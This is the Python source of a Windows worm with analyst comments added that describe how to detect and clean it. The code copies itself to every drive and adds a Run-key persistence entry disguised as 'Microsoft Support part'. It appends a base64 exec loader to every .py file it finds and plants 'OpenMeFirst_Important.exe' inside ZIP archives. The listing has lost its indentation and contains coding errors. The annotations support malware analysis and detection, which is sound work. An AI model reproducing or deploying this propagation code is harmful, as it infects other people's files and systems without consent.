#
# Note: most, if not all, of these functions are Windows-only.
#
# Don't forget to convert it to executable & I recommend to you pyinstaller
#
import os,string,random,sys,glob,hashlib,zipfile
from winreg import *
# drivers(): list the drive letters present on this host.
# Tests every letter A-Z with os.path.isdir("<letter>:") and returns the ones that
# exist, as strings of the form "C:". All three spread_* routines in this file
# iterate over this list.
# NOTE(review): any mounted letter passes the check, so removable and mapped
# network drives are presumably in scope too -- confirm when scoping containment.
def drivers():
drivs = []
for i in string.ascii_uppercase:
if os.path.isdir( i+":" ) == True:
drivs.append( i+":" )
return drivs
# fname(name): derive the file name used for a dropped copy.
# No "." in name  -> name + a random integer from 0 to 100 (both ends included).
# "." in name     -> text before the first "." + that integer + "." + the text
#                    between the first and second "."; anything after a second "."
#                    is discarded.
# Analyst note: only 101 suffixes exist, so copies can be hunted by name as
# <original stem><0-100>.<ext> in addition to hash matching.
def fname(name):
if "." not in name :
return name + str(random.randint(0,100))
elif "." in name :
return name.split(".")[0] + str(random.randint(0,100)) + "." + name.split(".")[1]
# md5_checksum(fi): read the whole file in binary mode and return its MD5 hex digest.
# spread_in_drivers() uses it to recognise existing copies by content, not by name.
# Analyst note: make_copy() duplicates bytes verbatim, so every copy shares one
# digest -- a single hash indicator (<SAMPLE_MD5>, placeholder) covers all of them.
# MD5 is used here purely as an equality check, not as a security control.
def md5_checksum(fi):
return hashlib.md5(open(fi, 'rb').read()).hexdigest()
# Startup(worms): registry persistence for each file name in `worms`.
# Author's precondition: the script has already been packaged as an executable.
# Per entry the code builds the quoted path "<cwd>\<name>", opens
# HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run with KEY_WRITE and sets a
# REG_SZ value named "Microsoft Support part <0-100>" whose data is that path.
# Indentation is missing from this listing, so which statements sit inside the
# loop is inferred from order -- confirm against the original file.
# Detection: registry value-set events on the HKLM Run key (e.g. Sysmon event ID 13)
# where the value name starts with "Microsoft Support part " or the data points
# outside the usual program directories. Writing under HKLM normally needs an
# elevated process, so a hit also indicates the privilege level the sample ran at.
def Startup(worms):
for worm in worms:
hiddenPath = os.getcwd()
hiddenPath = '\"' + hiddenPath + '\"'
regPath = os.getcwd()
regPath = regPath + r"\%s"%worm
regPath = '\"' + regPath + '\"'
regConnect = ConnectRegistry(None, HKEY_LOCAL_MACHINE)
regKey = OpenKey(regConnect, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRITE)
SetValueEx(regKey,"Microsoft Support part "+str(random.randint(0,100)),0, REG_SZ, r"" + regPath)
# Sets the hidden attribute through a shell call to `attrib +h`. The argument is
# hiddenPath, i.e. the quoted current working directory, so check for hidden
# directories (not only hidden files) during triage.
os.system("attrib +h " + hiddenPath)
# make_copy(old, new): byte-for-byte file copy.
# Reads all of `old` in binary mode and writes it to `new`, creating or truncating
# the destination. Because nothing is altered in transit, source and copy have
# identical content hashes.
def make_copy( old,new ):
old_file = open( old,"rb" )
new_file = open( new,"wb" )
old_data = old_file.read()
new_file.write( old_data )
old_file.close()
new_file.close()
# Goback(): the author's stated intent is to climb from a nested directory to the
# drive root (C:).
# As written it calls os.popen("cd ..") twenty times; each call starts a separate
# shell process, and the returned handle `a` is never read or closed.
# Telemetry: a burst of twenty short-lived shell children from a single parent
# process at the start of every spread_* routine.
def Goback():
for i in range( 0,20 ):
a = os.popen("cd ..")
# spread_in_drivers(): place one copy of the running file on each detected drive.
# Author's precondition: the script has already been packaged as an executable.
# Statement order: Goback(); list drives; read the running file (sys.argv[0]);
# then per drive: chdir to it, glob "*.exe" in that one directory (not recursive),
# compare each candidate's MD5 with the running file's MD5, and if none matches
# call make_copy() with a name produced by fname().
# Indentation is missing from this listing, so the loop nesting described here is
# inferred from statement order -- confirm against the original file.
# Detection: a process writing a new .exe whose hash equals its own image hash,
# named <own stem><0-100>.exe, on several drive letters in quick succession.
# The duplicate check is by content hash, so renaming a copy does not hide it
# from the check and a hash sweep finds every copy.
def spread_in_drivers():
Goback()
drivs = drivers()
#current_driver = os.getcwd().split( ":" )[0]
name = sys.argv[0]
f = open( name , "rb" )
data = f.read()
f.close()
for driv in drivs:
exist = 0
os.chdir( driv )
# Candidate set: the .exe files in the directory chdir() landed in.
driv_files = glob.glob( "*.exe" )
for fi in driv_files:
if md5_checksum( fi ) == md5_checksum( name ):
exist = 1
if exist == 0 :
make_copy( name,fname(name) )
# spread_in_python(): append a loader stub to Python source files.
# Author's intent: a modified script that is moved to another machine and run
# there starts the executable on that machine as well. Author's precondition: the
# script has already been packaged as an executable.
# Statement order: Goback(); per drive chdir and collect paths from
# `dir /s /b "*.py"`; for each path whose text lacks the marker
# "#--SayTheMagicWord--", open it in append mode and write four newlines, the
# marker, and a one-line `import base64,os;exec(base64.b64decode(...))` stub.
# The encoded text writes a file named 'YourDailyWorm.exe' and starts it.
# Indentation is missing from this listing, so whether the per-file loop runs
# inside the per-drive loop is inferred -- confirm against the original file.
# NOTE(review): this describes the statements as written; a static read does not
# show that the routine runs to completion, so treat the items below as things to
# search for rather than as proof of execution.
# Detection: search .py files for the literal marker or for a trailing
# exec(base64.b64decode( line; look for 'YourDailyWorm.exe' on disk and in
# process-creation logs; watch for one process appending to many .py files.
# Remediation: the change is append-only, so the original content ends just
# before the marker; restore from version control or backup where possible.
# Files that already contain the marker are skipped by the check below.
def spread_in_python():
Goback()
files = []
# Recursive listing of .py paths on each drive via the shell.
for driv in drivers():
os.chdir( driv )
files = os.popen( 'dir /s /b "*.py"' ).read().split( "\n" )
for f in files:
if "#--SayTheMagicWord--" not in open( f,"r" ).read() :
a=open(f,"a+")
a.write("\n\n\n\n#--SayTheMagicWord--\nimport base64,os;exec(base64.b64decode('{}'))".format(base64.b64encode("open('YourDailyWorm.exe','w').write('{}');os.popen('YourDailyWorm.exe')".format(open(sys.argv[0],'rb').read()))))
a.close()
# replace_file(old_file, data): truncate `old_file` and write `data` in its place.
# The file is opened with mode "w". In this listing the only caller is
# spread_in_zip(), which uses it to overwrite an archive at its original path, so
# the path stays the same while content, size and modification time change.
def replace_file( old_file,data ):
f = open( old_file,"w" )
f.write(data)
f.close()
# spread_in_zip(): rebuild ZIP archives so they contain a copy of the running file.
# Author's precondition: the script has already been packaged as an executable.
# Statement order: Goback(); per drive chdir and collect paths from
# `dir /s /b "*.zip"`; for each archive whose name list lacks
# "OpenMeFirst_Important.exe": extract everything into a relative "temp"
# directory, chdir into it, copy the running file in under that name, create a
# new archive named after the original's basename from the directory listing,
# overwrite the original path through replace_file(), then chdir("..") and call
# os.remove("temp").
# Indentation is missing from this listing, so the loop nesting described here is
# inferred from statement order -- confirm against the original file.
# NOTE(review): this describes the statements as written; a static read does not
# show that the routine runs to completion, so treat the items below as things to
# search for rather than as proof of execution.
# Detection: archives with a top-level entry "OpenMeFirst_Important.exe"; one
# process reading many .zip files and creating a directory named "temp"; archive
# modification times changing in bulk.
# The skip test is by entry name only, so archives already listing that name are
# left untouched.
def spread_in_zip():
Goback()
name = sys.argv[0]
files = []
# Recursive listing of .zip paths on each drive via the shell.
for driv in drivers():
os.chdir( driv )
files = os.popen( 'dir /s /b "*.zip"' ).read().split( "\n" )
for f in files:
if "OpenMeFirst_Important.exe" not in zipfile.ZipFile(f).namelist():
# Unpack the archive into a working directory named "temp".
old_zip = zipfile.ZipFile(f)
old_zip.extractall("temp")
os.chdir( "temp" )
# Copy the running file in under the fixed entry name.
make_copy( name,"OpenMeFirst_Important.exe" )
old_zip.close()
# New archive, named after the original archive's basename.
new_zip = zipfile.ZipFile( os.path.basename(f),"w" )
# Add every entry of the working directory to the new archive.
for fi in os.listdir():
new_zip.write(fi)
new.close()
# Overwrite the original archive path with the rebuilt archive's bytes.
replace_file( f,open( os.path.basename(f) ,"rb").read() )
# Leave the working directory and request its removal.
os.chdir("..")
os.remove("temp")
#I will Continue later.. ;)